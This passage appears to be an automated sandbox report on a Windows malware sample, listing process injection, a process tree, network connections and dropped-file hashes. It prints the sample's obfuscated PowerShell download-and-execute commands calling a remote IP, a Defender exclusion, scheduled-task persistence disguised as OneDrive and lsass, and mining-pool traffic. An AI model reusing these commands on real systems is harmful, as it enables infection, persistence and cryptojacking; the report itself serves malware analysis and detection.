Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1620 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1620 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1620 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1620 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1620 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1620 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1620 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1620 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2616 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2616 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2616 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2616 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2616 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2616 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2616 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2616 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4172 wrote to memory of 3608 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 4172 wrote to memory of 3608 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 2208 wrote to memory of 4252 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2208 wrote to memory of 4252 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2208 wrote to memory of 536 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2208 wrote to memory of 536 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2208 wrote to memory of 3844 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2208 wrote to memory of 3844 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2208 wrote to memory of 5116 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2208 wrote to memory of 5116 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4172 wrote to memory of 5024 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 4172 wrote to memory of 5024 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 4172 wrote to memory of 5024 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 4172 wrote to memory of 3392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 4172 wrote to memory of 3392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 4172 wrote to memory of 3392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 3008 wrote to memory of 2040 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3008 wrote to memory of 2040 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3008 wrote to memory of 1848 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3008 wrote to memory of 1848 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3008 wrote to memory of 4848 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3008 wrote to memory of 4848 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3008 wrote to memory of 4680 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3008 wrote to memory of 4680 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3392 wrote to memory of 640 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 3392 wrote to memory of 640 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 3392 wrote to memory of 640 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1584 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 3392 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 3392 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 3392 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 3392 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 3392 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 3392 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 4608 wrote to memory of 624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4608 wrote to memory of 624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4608 wrote to memory of 624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1584 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe

"C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\AppData\Roaming\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Roaming\dllhost.exe

"C:\Users\Admin\AppData\Roaming\dllhost.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "OneDrive"

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\lsass.exe

"C:\Users\Admin\AppData\Roaming\lsass.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 07:52 /du 23:59 /sc daily /ri 1 /f

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\ProgramData\lsass\lsass.exe

"C:\ProgramData\lsass\lsass.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1CFE.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 7

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
RU 62.204.41.23:80 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
US 8.8.8.8:53 23.41.204.62.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 117.18.232.240:80 tcp
US 93.184.221.240:80 tcp
US 93.184.220.29:80 tcp
US 93.184.220.29:80 tcp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:80 ipinfo.io tcp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
RU 62.204.41.23:80 62.204.41.23 tcp
FR 40.79.141.153:443 tcp
US 8.8.8.8:53 maper.info udp
DE 148.251.234.93:443 maper.info tcp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 117.18.232.240:80 tcp
US 117.18.232.240:80 tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
NL 173.223.113.164:443 tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 86.8.109.52.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
NL 173.223.113.131:80 tcp
US 131.253.33.203:80 tcp
US 93.184.221.240:80 tcp

Files

memory/1620-133-0x0000000000E00000-0x0000000000E26000-memory.dmp

memory/1540-135-0x0000017735260000-0x0000017735270000-memory.dmp

memory/1540-136-0x0000017735260000-0x0000017735270000-memory.dmp

memory/4172-137-0x00000255B1E90000-0x00000255B1EA0000-memory.dmp

memory/2616-138-0x0000022B20140000-0x0000022B20150000-memory.dmp

memory/4172-139-0x00000255B1E90000-0x00000255B1EA0000-memory.dmp

memory/2616-140-0x0000022B20140000-0x0000022B20150000-memory.dmp

memory/2028-141-0x000001A8B3E40000-0x000001A8B3E50000-memory.dmp

memory/2028-142-0x000001A8B3E40000-0x000001A8B3E50000-memory.dmp

memory/1540-153-0x00000177351B0000-0x00000177351D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dgfbp3jq.zeu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4172-183-0x00000255B1E90000-0x00000255B1EA0000-memory.dmp

memory/2616-182-0x0000022B20140000-0x0000022B20150000-memory.dmp

memory/2028-184-0x000001A8B3E40000-0x000001A8B3E50000-memory.dmp

memory/1964-185-0x0000000000400000-0x000000000040C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6622ed5f8592ea827a26d5608f8fec3f
SHA1 e4360bdbaba62948776e4efba19120ecef7b0cbe
SHA256 c62f098bc2f7f95c2714f975915712a196bbd5cf59b577f51778db4daa546661
SHA512 c3da031cd6ffb73cc469fa128b89d56d920f467775668787361abc3c86bddee295a9356dfee8a106f697fcab43ce573172308d6f60779de2d6529c4ff614a07d

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/1964-189-0x00000000051A0000-0x0000000005206000-memory.dmp

memory/1964-190-0x00000000052B0000-0x000000000534C000-memory.dmp

memory/1964-191-0x0000000005350000-0x00000000053B6000-memory.dmp

memory/1964-193-0x00000000058E0000-0x00000000058F0000-memory.dmp

memory/4172-195-0x00000255B1E90000-0x00000255B1EA0000-memory.dmp

memory/4172-196-0x00000255B1E90000-0x00000255B1EA0000-memory.dmp

memory/2028-197-0x000001A8B3E40000-0x000001A8B3E50000-memory.dmp

memory/2028-198-0x000001A8B3E40000-0x000001A8B3E50000-memory.dmp

memory/4172-200-0x00000255B1E90000-0x00000255B1EA0000-memory.dmp

memory/2028-201-0x000001A8B3E40000-0x000001A8B3E50000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/1964-208-0x00000000058E0000-0x00000000058F0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6622ed5f8592ea827a26d5608f8fec3f
SHA1 e4360bdbaba62948776e4efba19120ecef7b0cbe
SHA256 c62f098bc2f7f95c2714f975915712a196bbd5cf59b577f51778db4daa546661
SHA512 c3da031cd6ffb73cc469fa128b89d56d920f467775668787361abc3c86bddee295a9356dfee8a106f697fcab43ce573172308d6f60779de2d6529c4ff614a07d

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

memory/3788-229-0x000001CDC8E30000-0x000001CDC8E40000-memory.dmp

memory/3788-230-0x000001CDC8E30000-0x000001CDC8E40000-memory.dmp

memory/5024-231-0x0000000000400000-0x000000000058B000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/3608-235-0x00007FF7EC980000-0x00007FF7ED34A000-memory.dmp

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/3392-247-0x0000000000540000-0x0000000000960000-memory.dmp

memory/3392-248-0x0000000000540000-0x0000000000960000-memory.dmp

memory/3392-249-0x0000000000540000-0x0000000000960000-memory.dmp

memory/3392-250-0x0000000006C90000-0x0000000007234000-memory.dmp

memory/2600-251-0x00000202B5A10000-0x00000202B5A20000-memory.dmp

memory/3392-257-0x00000000067D0000-0x0000000006862000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8eba69a0f1e0e4422f4c64d92aa7bdff
SHA1 f30d4b77a12b3f341ff509beac91d29ede9ea5a6
SHA256 68408a00cbd6c15bec32c86d05dddea1e0e1f7adc16536ba244d2a947ff670a4
SHA512 10ee30f9f650085de64a4bc50657ecaf7290e2913fa0f92aca165044bea7a2c8e4f1e3fdd9643949236e66c75f61e701683e1678bd043e4d2e4532dfefb8f9aa

memory/2600-263-0x00000202B5A10000-0x00000202B5A20000-memory.dmp

memory/2600-264-0x00000202B5A10000-0x00000202B5A20000-memory.dmp

memory/2600-265-0x00000202B5A10000-0x00000202B5A20000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 14061e2301a93eea286fc6fb05597df0
SHA1 c2726bc34766b2ea625f863dbe21ec570b4285a7
SHA256 65c70d2563e5cb1c944b59ddd44b9a5576badfebc738934ec9b9f780fb7891cc
SHA512 bd853ec6eca30046143718615aff0032082d4c2a97a7c2032673c7405e373f5554bc843f914cc64b81afdfcfd8de4304136c33a45940d56a1733f917433703fa

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f8d061cb5bbb2559aaf515aec28227a0
SHA1 24251cc79b5c4f61c8154be0a18c5127713c796f
SHA256 ce7532548c92e3d3da457e2e8fa83ad4077a52af322c2b8635ca19cbbdc38269
SHA512 a02b2b0f43fef99513543d3be68c2fcad0dd6e66aa6c63e58f9874a51c27f58cdac79c4d9059a92d6a3e5b5235c9ad294abd2716109335f917e7df092980bf8f

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/3392-288-0x0000000000540000-0x0000000000960000-memory.dmp

memory/5024-289-0x0000000000400000-0x000000000058B000-memory.dmp

